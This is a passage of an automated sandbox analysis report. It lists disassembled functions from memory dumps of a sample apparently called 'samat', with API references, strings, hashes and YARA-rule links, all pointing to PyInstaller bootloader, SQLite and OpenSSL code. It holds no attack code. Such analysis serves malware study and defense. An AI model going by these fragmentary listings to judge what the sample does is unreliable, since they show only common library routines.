Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memcpy$memset
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 438689982-1046679716
Opcode ID: a7773bcf006ca47f508f3509f08daab0c77021ee5096fe5b50ed20204dddea81
Instruction ID: 76cbca8ff14f2e97eb0810183328a62863711e7355ed53accf3252f40d86c59b
Opcode Fuzzy Hash: a7773bcf006ca47f508f3509f08daab0c77021ee5096fe5b50ed20204dddea81
Instruction Fuzzy Hash: 53F15E32A09A8286EF65DF2994043BA6BA1EB85BC8F084135DB4D0B7D5DF7CE5838744

Function 00007FF8B8002250 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 586stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B80022C7
memcpy.VCRUNTIME140 ref: 00007FF8B8002403

Strings

:memory:, xrefs: 00007FF8B80022BD

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memcpystrcmp
String ID: :memory:
API String ID: 4075415522-2920599690
Opcode ID: ef0f4c48fb7268e94bdb7380642fef1f1c5abab4a2eb0e213b61a67f484a65ae
Instruction ID: a44392c6cdfbef0cb1796b11b4b899ee30d52b14b3bd17d9e0a714b34eeff8d6
Opcode Fuzzy Hash: ef0f4c48fb7268e94bdb7380642fef1f1c5abab4a2eb0e213b61a67f484a65ae
Instruction Fuzzy Hash: 6A426D62A0A78B82EE679B69955073967A0FF85BC4F084135CB4E077A1DF3CE497C708

Function 00007FF7E12C9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF7E12C92B3
FindClose.KERNEL32 ref: 00007FF7E12C92C2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 303cc4c16ec65fcddf93b7d255406e535a04841912aebca1591233be52101179
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: F6F0C822B1878186FB609B60B88A766B354BB84375F840337DAAE12AD4DF7CD059CA05

Function 00007FF8B7FF1230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8B7FF1255

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction ID: 127545bfd5708d340e4017ced4b755c6033eac655890717380073fe0dae02455
Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction Fuzzy Hash: 69A1D960A0FB47C1FE549B8DE85477822A0BF45BD5F580935CB0E4A7A0EF6CE496C718

Function 00007FF7E12C1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12C7F90: _fread_nolock.LIBCMT ref: 00007FF7E12C803A

_fread_nolock.LIBCMT ref: 00007FF7E12C1A1B

Part of subcall function 00007FF7E12C2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E

Strings

Could not allocate memory for archive structure!, xrefs: 00007FF7E12C1A61
calloc, xrefs: 00007FF7E12C1A68
MEI, xrefs: 00007FF7E12C1991
Could not read full TOC!, xrefs: 00007FF7E12C1B55
malloc, xrefs: 00007FF7E12C1B22
Failed to seek to cookie position!, xrefs: 00007FF7E12C19EE
fread, xrefs: 00007FF7E12C1A32, 00007FF7E12C1B5C
Error on file., xrefs: 00007FF7E12C1B8D
fseek, xrefs: 00007FF7E12C19F5
Could not allocate buffer for TOC!, xrefs: 00007FF7E12C1B1B
Failed to read cookie!, xrefs: 00007FF7E12C1A2B

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
Instruction ID: 099d9a3fd213d9c3470f2c5f8372f798258e2db17362bb36acf9110826a5232a
Opcode Fuzzy Hash: da661dafef7a958cffc458f9031f094bed4044546fae98e38e9c6353f513da79
Instruction Fuzzy Hash: 46819171B08682C6EB11EB14D8433F9A398AF48784FC08433EA8D87795DEBCE545D762

Function 00007FF8B838ECC0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FF8B838EF54, 00007FF8B838EF91, 00007FF8B838EFBE, 00007FF8B838F031
read_state_machine, xrefs: 00007FF8B838EF4D, 00007FF8B838EF8A, 00007FF8B838EFB2, 00007FF8B838F025

Memory Dump Source

Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true

Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem.c$read_state_machine
API String ID: 0-3323778802
Opcode ID: c8972936501a879b7e84c5051af7770807ba9d65b882bacb7b5450dec163fd8f
Instruction ID: 59bb07dead024b33a744ff808182936bbd85c3656d4cf010424ab90ef6fa5e68
Opcode Fuzzy Hash: c8972936501a879b7e84c5051af7770807ba9d65b882bacb7b5450dec163fd8f
Instruction Fuzzy Hash: A9914972A0868686FB509B29D8503BD2790EB89B88F5C413ADB0D476D6CF7DE44BC748

Function 00007FF8B838F6B0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3(?,?,FFFFFFFF,00000000,00007FF8B838F416), ref: 00007FF8B838F762
ERR_set_debug.LIBCRYPTO-3(?,?,FFFFFFFF,00000000,00007FF8B838F416), ref: 00007FF8B838F77A

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FF8B838F773, 00007FF8B838FA62
write_state_machine, xrefs: 00007FF8B838F76C, 00007FF8B838FA5B

Memory Dump Source

Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true

Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd

Similarity

API ID: R_newR_set_debug
String ID: ..\s\ssl\statem\statem.c$write_state_machine
API String ID: 193678381-552286378
Opcode ID: e5d1fe94fccde403d4ccffd35c49600b4c13cc4e7178492653a3fc2a8d140b00
Instruction ID: 6d4d2006c46abc650adff783cf34b2a914a2e3143a1c3cc9dd2115bf24e17170
Opcode Fuzzy Hash: e5d1fe94fccde403d4ccffd35c49600b4c13cc4e7178492653a3fc2a8d140b00
Instruction Fuzzy Hash: A6A14C32A08A4286EB649B2DD4547BD23A0FB48BC8F5C4136DB4D47696DF3ED947CB08

Function 00007FF7E12C1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C15DF
malloc, xrefs: 00007FF7E12C151F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C14DE
fread, xrefs: 00007FF7E12C15E6
fseek, xrefs: 00007FF7E12C14E5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7E12C1518

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 041c8b2bf8c5c3e51d5a3dfba2571142eaa5c99664a91f17fba29c235bc43b34
Instruction ID: 1e45551eb6095946b4a5ee24d7cefa3ff41efbdd6b5f6c094339b1c74744a1b0
Opcode Fuzzy Hash: 041c8b2bf8c5c3e51d5a3dfba2571142eaa5c99664a91f17fba29c235bc43b34
Instruction Fuzzy Hash: CB415D22B0854286EB11EB21AC023B9E398BB54784FD44833EE4D47A95DEBCE501D666

Function 00007FF8B7E8ECA8 Relevance: 13.7, APIs: 9, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B7E8ECD0
__scrt_initialize_crt.LIBCMT ref: 00007FF8B7E8ED15
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8B7E8ED22
_RTC_Initialize.LIBCMT ref: 00007FF8B7E8ED50
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8B7E8ED76
__scrt_release_startup_lock.LIBCMT ref: 00007FF8B7E8EDA1

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: deb1322ace880252273496c75106878e47c311885b03c3f26c29ac77a371df4f
Instruction ID: 3b0ef4d196e666aea3233456ab45f4062a586b01c0aaaad3f83dfdf9e98be63b
Opcode Fuzzy Hash: deb1322ace880252273496c75106878e47c311885b03c3f26c29ac77a371df4f
Instruction Fuzzy Hash: 42817C61E187438AFB50AB6DA4412BD26A1AF85FC0F944135EB0C9B7B7EE3DE8558700

Function 00007FF7E12C1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7E12C12BA
1.3.1, xrefs: 00007FF7E12C1249
malloc, xrefs: 00007FF7E12C12C1, 00007FF7E12C12F6
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7E12C12EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7E12C1276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7E12C141E

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 95934225c7861964a86c5fd243f738637417d3f2bd857982cceff62bbcb17e09
Instruction ID: 853aabfe5072ced9c79ec08722657eb072b097d7335e90c100d5baa31dfaff51
Opcode Fuzzy Hash: 95934225c7861964a86c5fd243f738637417d3f2bd857982cceff62bbcb17e09
Instruction Fuzzy Hash: A451C422B0868285E720BB11EC423BAE298FF85794FD44133EE4D47B95EEBCE441D712

Function 00007FF7E12DED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE8C
GetProcAddress.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE98

Strings

api-ms-, xrefs: 00007FF7E12DEDD6
ext-ms-, xrefs: 00007FF7E12DEDE9

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 1b650c0e31b8721e017b0af88d963a610a528f0ca67c809660a10f3d39ba552e
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: A641F722B1960241EB16EB16DC02775A299BF49BA0FC9453BDD1D57384DFBCE405C326

Function 00007FF7E12C36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36E1
GetLastError.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36EB

Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99

Strings

GetModuleFileNameW, xrefs: 00007FF7E12C36FA
Failed to resolve full path to executable %ls., xrefs: 00007FF7E12C3739
Failed to obtain executable path., xrefs: 00007FF7E12C36F3
\\?\, xrefs: 00007FF7E12C375A
Failed to convert executable path to UTF-8., xrefs: 00007FF7E12C3790

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: 971a2f209c4a8f0fc8bffeea66a44aced6b79d9d314c46b23a61a96cf6deef61
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: 8C219651B1854241FB25B724EC063B6A258BF84354FC08133E75E825D5EEBCE108C322

Function 00007FF8B80643D0 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 334COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF8B8064559

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FF8B806474F
table, xrefs: 00007FF8B80643FA
ase, xrefs: 00007FF8B806465D
sqlite_temp_master, xrefs: 00007FF8B8064415
sqlite_master, xrefs: 00007FF8B806441C
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FF8B8064474

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memcpy
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 3510742995-879093740
Opcode ID: c49cf4d78548e88d96e6518935fb125b3f34a24330c009978db129c1e6e07f2a
Instruction ID: 4c506aa90831c59534059ef8c229b503f9eaf5063b6afa9f40f7b1f01fe4ad28
Opcode Fuzzy Hash: c49cf4d78548e88d96e6518935fb125b3f34a24330c009978db129c1e6e07f2a
Instruction Fuzzy Hash: 7DE18422E09B928AEB15CF6981402BD27A5EF45BD8F058235DF1D177A6DF38E853C348

Function 00007FF7E12DBA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DBE89

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction ID: e7d519d65b728c48832a4c23c7b796c3002ee6340edb93491681c20126f4e3bd
Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
Instruction Fuzzy Hash: BFC1E423B0C68695E760AB15D8163BDAB58FB86B80FD54133EA4D03791CEFEE4458723

Function 00007FF8B83A15A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FF8B83A16C6
ERR_set_debug.LIBCRYPTO-3 ref: 00007FF8B83A16DE
ERR_new.LIBCRYPTO-3 ref: 00007FF8B83A1761
ERR_set_debug.LIBCRYPTO-3 ref: 00007FF8B83A1779

Strings

tls_get_message_header, xrefs: 00007FF8B83A16CB, 00007FF8B83A1766
..\s\ssl\statem\statem_lib.c, xrefs: 00007FF8B83A16D7, 00007FF8B83A1772

Memory Dump Source

Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true

Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd

Similarity

API ID: R_newR_set_debug
String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
API String ID: 193678381-2714770296
Opcode ID: f45773da2448751231a1ca749fc05bc9d2df97a6a3f744ec35cbeb086fc78321
Instruction ID: b7ec3aa805d0e96575cf0b4c43a127b49e4a11b81759eabe126c6ae4de1c9a1a
Opcode Fuzzy Hash: f45773da2448751231a1ca749fc05bc9d2df97a6a3f744ec35cbeb086fc78321
Instruction Fuzzy Hash: 6B615B32A0878685EB609F29E8503BD37A4FB49B88F1C8036DB8E47795CF3DD4568718

Function 00007FF7E12C6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7E12C6456
ucrtbase.dll, xrefs: 00007FF7E12C63DD
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7E12C6407
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7E12C63C7
Failed to load Python DLL '%ls'., xrefs: 00007FF7E12C64A7
LoadLibrary, xrefs: 00007FF7E12C64AE

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
